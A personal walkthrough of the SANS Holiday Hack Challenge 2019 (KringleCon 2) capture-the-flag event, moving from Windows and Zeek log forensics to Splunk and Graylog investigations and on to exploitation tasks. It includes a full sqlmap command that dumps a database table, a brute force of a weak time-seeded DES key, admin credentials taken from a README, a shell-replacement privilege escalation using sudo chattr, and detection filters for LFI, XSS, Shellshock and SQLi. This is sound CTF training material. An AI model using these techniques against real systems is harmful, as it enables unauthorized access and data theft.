Writeup: SANS Holiday Hack Challenge 2019 (KringleCon 2)

I enjoyed this year’s challenges a lot! A couple of the objectives had be stumped for a bit, especially in the areas I am not strong in, but that is why these all-rounder events are great to brush up your skills.

Thanks to the team at SANS for spending the time and effort for hosting the event every year!

Main Objectives

• 0. Talk to Santa in the Quad
• 1. Find the Turtle Doves
• 2. Unredact Threatening Document
• 3. Windows Log Analysis: Evaluate Attack Outcome
• 4. Windows Log Analysis: Determine Attacker Technique
• 5. Network Log Analysis: Determine Compromised System
• 6. Splunk
• 7. Get Access To The Steam Tunnels
• 8. Bypassing the Frido Sleigh CAPTEHA
• 9. Retrieve Scraps of Paper from Server
• 10. Recover Cleartext Document
• 11. Open the Sleigh Shop Door
• 12. Filter Out Poisoned Sources of Weather Data

Other Challenges

• Escape Ed — Bushy Evergreen
• Frosty Keypad — Tangle Coalbox
• Greylog — Pepper Minstix
• Linux Path — SugarPlum Mary
• Xmas Laser Cheer — Sparkle Redberry
• Holiday Hack Trail — Minty Candy Cane
• Smart Braces — Kent Tinseltooth
• Mongo Pilfter — Holly Evergreen
• Nyanshell — Alabaster Snowball
• Zeek JSON Logs — Wunorse Openslae

Main Objectives

0. Talk to Santa in the Quad

Make your way outside and speak to Santa.

1. Find the Turtle Doves

From the Quad, head to the one of the north entrances to find the doves.

2. Unredact Threatening Document

The letter was a little hard to find but is located in the top left corner of the quad. This links you the document, LetterToElfUPersonnel.pdf

Simply just select all the text and copy it to a text editor to see what was underneath the red boxes:

Date: February 28, 2019 To the Administration, Faculty, and Staff of Elf University 17 Christmas Tree Lane North Pole From: A Concerned and Aggrieved Character Subject: DEMAND: Spread Holiday Cheer to Other Holidays and Mythical Characters… OR ELSE! Attention All Elf University Personnel, It remains a constant source of frustration that Elf University and the entire operation at the North Pole focuses exclusively on Mr. S. Claus and his year-end holiday spree. We URGE you to consider lending your considerable resources and expertise in providing merriment, cheer, toys, candy, and much more to other holidays year-round, as well as to other mythical characters. For centuries, we have expressed our frustration at your lack of willingness to spread your cheer beyond the inaptly-called “Holiday Season.” There are many other perfectly fine holidays and mythical characters that need your direct support year-round. If you do not accede to our demands, we will be forced to take matters into our own hands. We do not make this threat lightly. You have less than six months to act demonstrably. Sincerely, — A Concerned and Aggrieved Character

Answer: DEMAND

3. Windows Log Analysis: Evaluate Attack Outcome

I use a tool called Event Log Explorer to quickly look at Windows event logs.

The time frame for this export is pretty small so we can just look at 4624 events (successful logons).

Answer: supatree

4. Windows Log Analysis: Determine Attacker Technique

First I converted the JSON to CSV to be able to sort a bit better.

I noticed that ntdsutil (one way to dump creds from Active Directory) was used and it turned out to be correct!

Answer: ntdsutil

5. Network Log Analysis: Determine Compromised System

Working with Zeek logs, I used the bro-cut utility to select the fields I’m looking for. Here are some good searches to look at in the conn logs:

Long Connection Times
> cat conn* | bro-cut id.orig_h id.resp_h duration | sort -k 3 -rn | uniq | datamash -g 1,2 sum 3 | head -10
Count number of connections per source>dest IPs
> cat conn* | bro-cut id.orig_h id.resp_h | uniq -c | sort -r | head -10

There was a number of large number of files (file logs) transfered between two hosts that stood out from the rest of the traffic. This could be indicative of C2 heartbeats.

Number of files transfered between hosts
cat file* | bro-cut tx_hosts rx_hosts source mime_type| grep -v SSL | sort -rn | uniq -c | sort -rn | head -10
7643 192.168.134.130 144.202.46.214 HTTP text/plain
7643 144.202.46.214 192.168.134.130 HTTP text/html

Lets have a look at the http log to see if we can find anything else on that destination IP 144.202.46.214:

> cat http* | bro-cut id.orig_h id.resp_h domain uri | grep 144.202.46.214 | uniq -c
7643 192.168.134.130 144.202.46.214 /504vsa/server/vssvc.php

The host 192.168.134.130 connected to this suspicious php URI 7643 times according to the http logs.

If we go back to the conn logs and grep on our suspected destination host, we can see that the connection times are every 10 seconds on the dot (use -d in bro-cut to convert the epoch to readable). This is a pretty good sign of a C2 connection.

> cat conn* | bro-cut -d ts id.orig_h id.resp_h | grep 144.202.46.214 | head -5
2019–08–23T22:00:21+1000 192.168.134.130 144.202.46.214
2019–08–23T22:00:31+1000 192.168.134.130 144.202.46.214
2019–08–23T22:00:41+1000 192.168.134.130 144.202.46.214
2019–08–23T22:00:51+1000 192.168.134.130 144.202.46.214
2019–08–23T22:01:01+1000 192.168.134.130 144.202.46.214

The source IP of these connections turned out to be the right answer.
Answer: 192.168.134.130

6. Splunk

(Jump to Question 8 for answer to this objective)

We are shown a chat app that introduces a couple of characters and also some questions.

Training Questions

1. What is the short host name of Professor Banas’ computer?

As prompted, the #ELFU SOC channel tells us the answer.
Answer:sweetums

2. What is the name of the sensitive file that was likely accessed and copied by the attacker? Please provide the fully qualified location of the file.

Looking around there was a suspicious powershell block running that was looking for files do to with Santa.

Answer: C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt

3. What is the fully-qualified domain name(FQDN) of the command and control(C2) server?

In the same set of powershell logs, there was a block of base64 encoded text.

After decoding the block, we have a bit more of an idea of what commands were run. Towards the end, a web call is being constructed and sent to this ip:

http://144.202.46.214:8080

Using the Sysmon logs, we can also see the network connections made by powershell.

Answer: 144.202.46.214.vultr.com

4. What document is involved with launching the malicious PowerShell code?

We can work backward what called powershell and then what document was part of that call.

Using the time range of the initial powershell call, there was a winword.exe that loaded a WMI dll. We can assume the macro used would use WMI to create the powershell process as the parent process was wmiprvse.exe.

Pivoting off the timestamp, I looked the File Created events in sysmon. The Professor opened a zip file from his mail that contained a macro enabled document just before the powershell events.

Answer:19th Century Holiday Cheer Assignment.docm

5. How many unique email addresses were used to send Holiday Cheer essays to Professor Banas?

There were 42 unique fields in the “results{}.workers.smtp.from” field but half of those were lowercase dups.

Answer:21

6. What was the password for the zip archive that contained the suspicious file?

If we go back to the malicious file, Buttercups_HOL404_assignment.zip, and look at any other events related, we find the submission email from Bradly Buttercups <Bradly.Buttercups@eIfu.org>.

In the email, the attacker gives us the password.

Answer:123456789

7. What email address did the suspicious file come from?

Answer: Bradly.Buttercups@eIfu.org

Sidenote: It also looks like the SPF check of the email didn’t trust the sender IP either.

softfail (protection.outlook.com: domain of transitioning eifu.org discourages use of 144.202.46.214 as permitted sender)

This IP is the same as the C2 server identified before.

8. (Main question) What was the message for Kent that the adversary embedded in this attack?

Using the hints in the from Alice, we need to find the document from the last question in the File Archive. stoQ is the metadata analyser and we need to match the path of the property to the file path.

A word document is made up of many .xml document and core.xml (as hinted by Alice) is the one that contains the main metadata of the word document.

core.xml (19th Century Holiday Cheer Assignment.docm)
...
 <dc:title>Holiday Cheer Assignment</dc:title>
 <dc:subject>19th Century Cheer</dc:subject>
 <dc:creator>Bradly Buttercups</dc:creator>
 <cp:keywords></cp:keywords>
 <dc:description>Kent you are so unfair. And we were going to make you the king of the Winter Carnival.</dc:description>
 <cp:lastModifiedBy>Tim Edwards</cp:lastModifiedBy>
...

Answer: Kent you are so unfair. And we were going to make you the king of the Winter Carnival.

7. Get Access To The Steam Tunnels

When trying to find the steam tunnels for the next challenge, I found a suspicious looking man running into a room that was empty when I chased after him. On his belt he had a curious key. In the original room there is a key cutter machine.

If we test the cutter and print out something like 1 2 3 4 5 6, we can see that it generates a key with the divots getting deeper as the number gets higher.

Example key testing the numbers.

Comparing the divots to the image of the man and attempting a few combinations I was able to recreate the key. Overlaying the image onto the target helped a lot.

Key cutter combination:122520

We gain entry to the steam tunnels and talk to Krampus. He admits he was the one that borrowed the turtle doves.

Answer: Krampus Hollyfeld

8. Bypassing the Frido Sleigh CAPTEHA

The goal of this challenge is to solve the image challenge in the extremely short time given. Taking to Krampus gives provides some pre-defined images and an API script.

The steps for this challenge are:

• Create ML model from pre-classified images
• Get CAPTeHA Challenge images and save them to disk
• Classify challenge images against model
• If image is one of the 3 categories the CAPTeHA requests, add to array and then send the response back to the server

Heavily borrowed code from: https://github.com/chrisjd20/img_rec_tf_ml_demo (Provided in one of the hint talks)

My resulting code was a mix between captecha_api.py and predict_images_using_trained_model.py from the link above.

I first ran retrain.py on the collection of pre-classified images form Krampus.

I used captecha_api.py as my base code and copied functions from predict_images_using_trained_model.py.

Full script: https://pastebin.com/SXXpHBPg

I had a problem with the request timing out, but after I increased the threading, it was successful in submitting heaps of requests. Resulting in:

9. Retrieve Scraps of Paper from Server

In the next challenge, we need to exploit the web app form to get access to a file on the server.

If you have completed the Graylog challenge, the hint points you in the direction of SQLi.

Playing around with some requests, it looks like this page may injectable but requires a token.

/application-check.php?elfmail=<test@email.com>&token=<token>

Also looking at the traffic in the network tab, a request is made to /validator.php which returns a token. This seems to be a csrf token that we need to get before submitting our request.

I created a custom rule to extract this field in Burp Suite.

I’ve added the studentportal.elfu.org to the scope of my macro so this will run when we request the /application-check.php.

/application-check.php?elfmail=test@email.com';&token=value
I added '; in the elfmail field to trigger the SQL error.

sqlmap --proxy=http://localhost:8080 --url="https://studentportal.elfu.org/application-check.php?elfmail=test@email.com&token=test" -p elfmail

To check on the macro, open up the session handling tracer and see how the token request is issued.

The token field is being populated with a token key generated in the macro request

We can now use SQLMap with --dump flag added to the above command

-D database_name
[07:13:23] [INFO] fetching tables for database: 'elfu'
[07:13:23] [INFO] used SQL query returns 3 entries
[07:13:23] [INFO] resumed: 'applications'
[07:13:23] [INFO] resumed: 'krampus'
[07:13:23] [INFO] resumed: 'students'
-T table_name
Database: elfu
Table: krampus
[6 entries]
+----+-----------------------+
| id | path                  |
+----+-----------------------+
| 1  | /krampus/0f5f510e.png |
| 2  | /krampus/1cc7e121.png |
| 3  | /krampus/439f15e6.png |
| 4  | /krampus/667d6896.png |
| 5  | /krampus/adb798ca.png |
| 6  | /krampus/ba417715.png |
+----+-----------------------+
Full command:
sqlmap --proxy=http://localhost:8080 --url="https://studentportal.elfu.org/application-check.php?elfmail=test@email.com&token=test" -p elfmail -D elfu -T krampus --dump

If we download the images listed in the krampus table above (eg: https://studentportal.elfu.org/krampus/<id>.png) and try to put them back together, you get something like this:

There is a piece missing but is enough to provide the answer for the question.

Answer: Super Sled-o-Matic

10. Recover Cleartext Document

I started this challenge by opening up the elfscrow binary to see what it could do. There was a few mentions of Wireshark being about to sniff the encryption method which may tell me more details.

While running the executable in encrypt mode multiple times, I quickly noticed the seed generated seemed to be the time in epoch.

Example: Seed = 1578090117

During the execution of the above we can see the encryption key being send in a post request to /api/store which then responds with a secret key value.

When we decrypt the file, we get the reverse when we send to /api/retrieve

After spending a bit of time in Ghidra looking at the decomplied code for elfscrow.exe, there was a couple of functions that I identified and renamed which look important.

generatekey()
This function appears to get the seed (epoch time) and call a random number generator, weirdbitsstuff() to create an 8 byte long string.

weirdbitsstuff()
This short function seems to generate “random” hex byes and return it to the generatekey() function which I’ve simplified here:

random = seed
random = random * 0x343fd + 0x269ec3; 
return random >> 0x10 & 0x7fff;

The main encrypt() function also can provide us the steps that are used to encrypt the files.

So know we know the following:

• Seed is generated on time
• How the “random” number generator work
• Encryption is DES-CBC

We can now brute force the generate key function to create any encryption key date if we know the time it was encrypted.

We don’t need the UUID from the elfscrow server because we are skipping that step and decrypting the file directly.

The challange says “Recover the plaintext content for this encrypted document. We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC.”

So we have a timeframe and can now attempt to brute force the key because the seeds will be from 1575658800 to 1575666000.

I based the crypto part of my code off: https://gist.github.com/forkd/168c9d74b988391e702aac5f4aa69e41

The rest are the functions that generate the key and attempt to decrypt.

Running this created many files but my solution was to grep -a "PDF" ElfUResearch_* over the files to find a successfully decrypted PDF:

The correct key seemed to be b5ad6a321240fbec and when opened we get our PDF!
Note: I tried opening the pdf on Mac OS but it said it was corrupted. I had to jump into Kali to get it to open.

Answer: Machine Learning Sleigh Route Finder

11. Open the Sleigh Shop Door

We find the door next to Shiny Upatree, and if you inspect the door it leads to the page: https://sleighworkshopdoor.elfu.org/

Lock 1: You don’t need a clever riddle to open the console and scroll a little.

Answer: Open the console in your web dev tools and it will provide a code.

Lock 2: Some codes are hard to spy, perhaps they’ll show up on pulp with dye?

Answer: The hints for this one tell you to use print preview to get the answer

Lock 3: This code is still unknown; it was fetched but never shown.

Answer: Check the network tab for an image that was downloaded.

Lock 4: Where might we keep the things we forage? Yes, of course: Local barrels!

Answer: Look at the local storage for the page.

Lock 5: Did you notice the code in the title? It may very well prove vital.

Answer: Type document.title in the console or hover over the tab bar

Lock 6: In order for this hologram to be effective, it may be necessary to increase your perspective.

Answer: Inspect element and increase the perspective css property.

Lock 7: The font you’re seeing is pretty slick, but this lock’s code was my first pick.

Answer: Inspect the element to see the font family

Lock 8: In the event that the .eggs go bad, you must figure out who will be sad.

Answer: Inspect the eggs element and notice an event handler for spoil. There is js code will set window[‘VERONICA’] to ‘sad’. VERONICA is the key.

Lock 9: This next code will be unredacted, but only when all the chakras are :active.

Answer: We need to find the all the elements with the “chakra” class and add the :active psuedo class.

Lock 10: Oh, no! This lock’s out of commission! Pop off the cover and locate what’s missing.

Answer: This requires moving a lot of <div> elements around.

If you first try to move the cover, it will reveal a circuit with a small code on the bottom right hand corner. If you try this code you will get an error in the console.

You can search for the key components in the DOM tree and drag the <div> to the last lock. Repeating this step, you find the “circuit” requires “Macaroni”, “Gnome” and “Swab”.

Answer: The Tooth Fairy

12. Filter Out Poisoned Sources of Weather Data

Sleigh Route Finder: https://srf.elfu.org/

Zeek logs: https://downloads.elfu.org/http.log.gz

cat http.log | jq '.[] | .uri '| uniq

Using the above command, I was able to find some interesting pages.

https://srf.elfu.org/README.md

https://srf.elfu.org/santa.html

And more. Many pages return a “401 — Unauthorized srfsession Cookie” but the read me gives us creds.

admin:924158F9522B3744F5FCD4D10FAC4356

We can now use the portal to block the attacker IPs.

The hint from Wunorse Openslae indicates we should be looking at LFI, XSS, Shellshock, and SQLi attacks. Lets create the jq queries to filter the traffic.

LFI:
cat http.log | jq '.[] | select (.uri | contains ("/../"))| ."id.orig_h"' >> malicious_ip.txt
cat http.log | jq '.[] | select (.uri | contains ("pass"))| ."id.orig_h"' >> malicious_ip.txt
XSS:
cat http.log | jq '.[] | select (.uri | contains ("<")) | ."id.orig_h"' >> malicious_ip.txt
cat http.log | jq '.[] | select (.host | contains ("<")) | ."id.orig_h"' >> malicious_ip.txt
Shellshock:
cat http.log | jq '.[] | select (.user_agent | contains (":; };"))| ."id.orig_h"' >> malicious_ip.txt
SQLi:
cat http.log | jq '.[] | select (.user_agent | contains ("'"'"'"))| ."id.orig_h"' >> malicious_ip.txt
cat http.log | jq '.[] | select (.uri | contains ("'"'"'"))| ."id.orig_h"' >> malicious_ip.txt
cat http.log | jq '.[] | select (.username | contains ("'"'"'"))| ."id.orig_h"' >> malicious_ip.txt
cat malicious_ip.txt | uniq

I used this list of IPs to create a pivot query to get malicious user agents.

Using the user agents, we can obtain more IPs. I did do a bit of trial and error as some of the user agents in the malicious list were actually benign.

while read useragents; do cat http.log | jq ‘.[] | select (.user_agent == ‘“$useragents”’)’; done < mal_useragents.txt > pivotuseragents.txt

Using this, you can select the id.orig_h field to find more attacker IPs.

In the end, there was around 126 IPs I entered into API to block but I have heard some only needed 95 IPs to complete the challenge

Once the Route successfully loaded we are given the answer.
Answer:0807198508261964

In the last room we find Santa with some dialogue to tie everything up. There is a suspicious note in the corner that may hint to next years challenge!

Other Challenges

Escape Ed — Bushy Evergreen

Answer: q
(Exit command for the Ed editor)

Frosty Keypad — Tangle Coalbox

Hint: One digit is repeated once, it’s prime, and you can see which keys were used

The keypad suggests the digits 1, 3 and 7 are used. 3 and 7 are the two primes.

I tried 1337 and then 7331 and it worked… If that wasn’t right, I was planning on generating the combos. Always try the obvious answers just in case!

Answer: 7331

Greylog — Pepper Minstix

Question 1: Minty CandyCane reported some weird activity on his computer after he clicked on a link in Firefox for a cookie recipe and downloaded a file.

What is the full-path + filename of the first malicious file downloaded by Minty?

Let’s look through the file creations from the process firefox.exe.

Answer: C:\Users\minty\Downloads\cookie_recipe.exe

Question 2: The malicious file downloaded and executed by Minty gave the attacker remote access to his machine. What was the ip:port the malicious file connected to first?

We can look at the network connections created from the cookie_recipe.exe process.

Answer: 192.168.247.175:4444

Question 3: What was the first command executed by the attacker?

Using ParentProcessCommandLine: “C:\Users\minty\Downloads\cookie_recipe.exe”, there were a number of commands run, but sorting by timestamp gives us the answer.

Answer: whoami

Question 4: What is the one-word service name the attacker used to escalate privileges?

There were other processes that were spawned from cookie_recipe.exe that were of interest from the previous questions. One of them was to create a service that would used WMI to start a process.

Answer: webexservice

Question 5: What is the file-path + filename of the binary ran by the attacker to dump credentials?

Now the attacker has escalated privileges, the attack attempted to run mimikatz. When submitting C:\mimikatz.exe, you are told its the wrong answer, so further digging was required.

Looking at the process created logs there was an event not long after the one above that used the same command line arguments as mimikatz does from a process called cookie.exe

Answer: C:\cookie.exe

Question 6: The attacker pivoted to another workstation using credentials gained from Minty’s computer. Which account name was used to pivot to another machine?

I first looked at successful logons (EventID:4624) and specifically RDP or remote based log ons (LogonType:10) from the attacker IP 192.168.247.175. This only returned one event…

Answer: alabaster

Question 7: What is the time ( HH:MM:SS ) the attacker makes a Remote Desktop connection to another machine?

We have already found this from the last question looking at logon type 10 events.

Answer: 06:04:28

Question 8: The attacker navigates the file system of a third host using their Remote Desktop Connection to the second host. What is the SourceHostName,DestinationHostname,LogonType of this connection?

I looked for SMB connections from the workstation that was RDP-ed to, to potentially highlight file browsing. There were several between workstation 2 and workstation 3. I then looked at EventID:4624 to confirm that there was a successful logon at the same time.

Answer: elfu-res-wks2,elfu-res-wks3,3

Question 9: What is the full-path + filename of the secret research document after being transferred from the third host to the second host?

Staying on elfu-res-wks2, I noticed a suspicious powershell command reading a file called super_secret_elfu_research.pdf.

Answer: C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf

Question 10: What is the IPv4 address (as found in logs) the secret research document was exfiltrated to?

By the looks of the logs from last question, it was uploaded to pastebin.com. The next network event gives the us the IP.

Answer: 104.22.3.84

Linux Path — SugarPlum Mary

Let’s check what “ls” we are actually using with the “which” command.

Lets try the version of ls in /bin/ … okay!

Answer: /bin/ls

Xmas Laser Cheer — Sparkle Redberry

We are given a powershell terminal to fix the lasers configuration and something about a note. The note callingcard.txt hinted to the history for this challenge. Lets have a look:

The 7th entry is the value for the laser angle, angle?val=65.5.
The 9th entry seems to talk variables. Let’s have a look at the environment variables set:

The “riddle” environment variable looks like we are on the right track.

The most recent file in /etc/ seems to be an archive /etc/apt/archive.

The magic byte of this file is PK — a zip file.

I unzipped the file and the next hint refers to a hash that can lead us to the next clue. We will need to recursively hash each file until we get a match.

Before that, let’s look at the executable called runme.elf. The file mode won’t let us run it until we change the attribute but now we have the refraction value.

Here is the command I ran to find the matching file:

$x = Get-ChildItem depths -recurse | where { (Get-FileHash -Path $_.FullName -Algorithm MD5).hash -eq “25520151A320B5B0D21561F92C8F6224”}

We now have one of the values to config the laser to: temperature?val=-33.5

The next step was finding the file with the longest name. My query ended up being a bit messy but this was the end result after a lot of fiddling:

Get-ChildItem -Path depths -Recurse -Force | Select-Object -Property FullName, @{Name=”FullNameLength”;Expression={($_.FullName.Length)}} | Sort-Object -Property FullNameLength -Descending | Select -First 1 | fl
Which gave the result: 
:/home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/fox/0jhj5xz6.txt
FullNameLength : 388

Outputting the file above give us the he next hint:

Get process information to include Username identification. Stop Process to show me you're skilled and in this order they must be killed:

bushy
alabaster
minty
holly

Do this for me and then you /shall/see .

I killed the processes in order of their username.

This allowed us to access a folder /shall. In there the file see had the next step.

/shall/see
Get the .xml children of /etc — an event log to be found. Group all .Id’s and the last thing will be in the Properties of the lonely unique event Id.

Looks like we need to find an event id that is unique.

The event file is located /etc/systemd/system/timers.target.wants/EventLog.xml

$xml = [xml](get-content /etc/systemd/system/timers.target.wants/EventLog.xml)

After spending a while looking at the structure of the xml file, i used several helpful queries.

Load xml file in var
[xml]$xml = get-content /etc/systemd/system/timers.target.wants/EventLog.xml
Count by Event Id
$xml.objs.obj.Props.i32 | where {$_.N -eq “Id”} | group ‘#text’
TaskDisplayName
$name = $xml.Objs.Obj.Props.S | ? {$_.N -like "TaskDisplayName"}
Properties
$props = $xml.Objs.Obj.Props.Obj | ? {$_.N -like "Properties"}
$props.LST.Obj.Props.S | select '#text'
Message
$msg = $xml.Objs.Obj.MS.S | ? {$_.N -like "Message"}
Select Event with Id=1
$xml.objs.obj.Props | where {$_.I32.'#text' -eq "1"} | select *

In the event with the ID=1, there is a powershell command with the correct gas values:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c “`$correct_gases_postbody = @{`n O=6`n H=7`n He=3`n N=4`n Ne=22`n Ar=11`n Xe=10`n F=20`n Kr=8`n Rn=9`n}`n”

Now we can reconfigure the laser and check the output.

(Invoke-WebRequest -Uri http://localhost:1225/api/angle?val=65.5).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/temperature?val=-33.5).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/refraction?val=1.867).RawContent 
$gas = @{O=6;H=7;He=3;N=4;Ne=22;Ar=11;Xe=10;F=20;Kr=8;Rn=9}
(Invoke-WebRequest -Uri http://localhost:1225/api/gas -Method POST -Body $gas).RawContent

Holiday Hack Trail — Minty Candy Cane

After playing around for a bit in the game, there were some hidden fields in the html. I also noticed these were used in form post submitted to the server

Editing these and submitting your next move in the game appears to work as there is no server side checks.

I set my difficulty to 1 and distance to 8000, pressed go and instantly won!

I’m pretty sure there is more to this. Maybe on medium and hard, you need to exploit the web app in different ways?

Smart Braces — Kent Tinseltooth

This is a simple iptables challenge. We are giving rules that are needed to be implemented in the file /home/elfuuser/IOTteethBraces.md:

1. Set the default policies to DROP for the INPUT, FORWARD, and OUTPUT chains.
2. Create a rule to ACCEPT all connections that are ESTABLISHED,RELATED on the INPUT and the OUTPUT chains.
3. Create a rule to ACCEPT only remote source IP address 172.19.0.225 to access the local SSH server (on port 22).
4. Create a rule to ACCEPT any source IP to the local TCP services on ports 21 and 80.
5. Create a rule to ACCEPT all OUTPUT traffic with a destination TCP port of 80.
6. Create a rule applied to the INPUT chain to ACCEPT all traffic from the lo interface.

Answer:
sudo iptables -P INPUT DROP
sudo iptables -P FORWARD DROP
sudo iptables -P OUTPUT DROP
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A INPUT -p tcp -s 172.19.0.225 --dport 22 -j ACCEPT
sudo iptables -A OUTPUT -p tcp -d 172.19.0.225 --sport 22 -j ACCEPT
sudo iptables -A INPUT -p tcp -m multiport --dports 21,80 -j ACCEPT
sudo iptables -A OUTPUT -p tcp -m multiport --sports 21,80 -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -A INPUT -i lo -j ACCEPT

Mongo Pilfter — Holly Evergreen

Lets start by running the list databases command.

mongo --quiet --eval  "printjson(db.adminCommand('listDatabases'))"

It indicates that it is the wrong port. I run netstat to see what ports are listenting which indicates port 12121. Lets try connect to port 12121 this time. Here is the the important commands to get to the solution! Answer:

elf@ac1a0418369d:~$ mongo -host localhost:12121
> show dbs
admin  0.000GB
elfu   0.000GB
local  0.000GB
test   0.000GB
> use elfu
switched to db elfu
> show collections
bait
chum
line
metadata
solution
system.js
tackle
tincan
> db.solution.find();
{ "_id" : "You did good! Just run the command between the stars: ** db.loadServerScripts();displaySolution(); **" }
> db.loadServerScripts();displaySolution();

Nyanshell — Alabaster Snowball

When you try to log in with the supplied creds, it will greet you with a bash animation but is not what we want.

As one of the hints suggests, on Linux, a user’s shell is determined by the contents of /etc/passwd. We are also told by Alabaster, that the account can use sudo.

Running sudo -l will tell us what we have privileges to run for.

If you cat /etc/passwd, you can also see that alabaster_snowball’s bash settings are set to /bin/nsh. Lets try use chattr as our account can run it as sudo.

List attributes
elf@c3e5163986da:~$ lsattr /etc/passwd 
--------------e---- /etc/passwd
If we can't edit the passwd file, then maybe we can edit the shell.
Running the same command on the nsh shell shows that it has the immutable flag (i)
elf@b3917701d002:~$ lsattr /bin/nsh
----i---------e---- /bin/nsh
Run chattr as sudo to remove the immutable flag from the file.
elf@b3917701d002:~$ sudo chattr -i /bin/nsh
Now we can edit this binary, lets replace it with a copy of /bin/bash try log in again.
elf@c544bf914610:~$ cp /bin/bash /bin/nsh
elf@c544bf914610:~$ su alabaster_snowball
Password: Password2
Loading, please wait......
You did it! Congratulations!

Zeek JSON Logs — Wunorse Openslae

Identify the destination IP address with the longest connection duration.

Instead of bro-cut, this time we need to use jq. The conn.log has a field duration that we need to filter on to find the longest connection

Answer:13.107.21.200

Thanks to SANS for organising the Holiday Hack Challenge! I look forward to doing it next year.

0x7a616368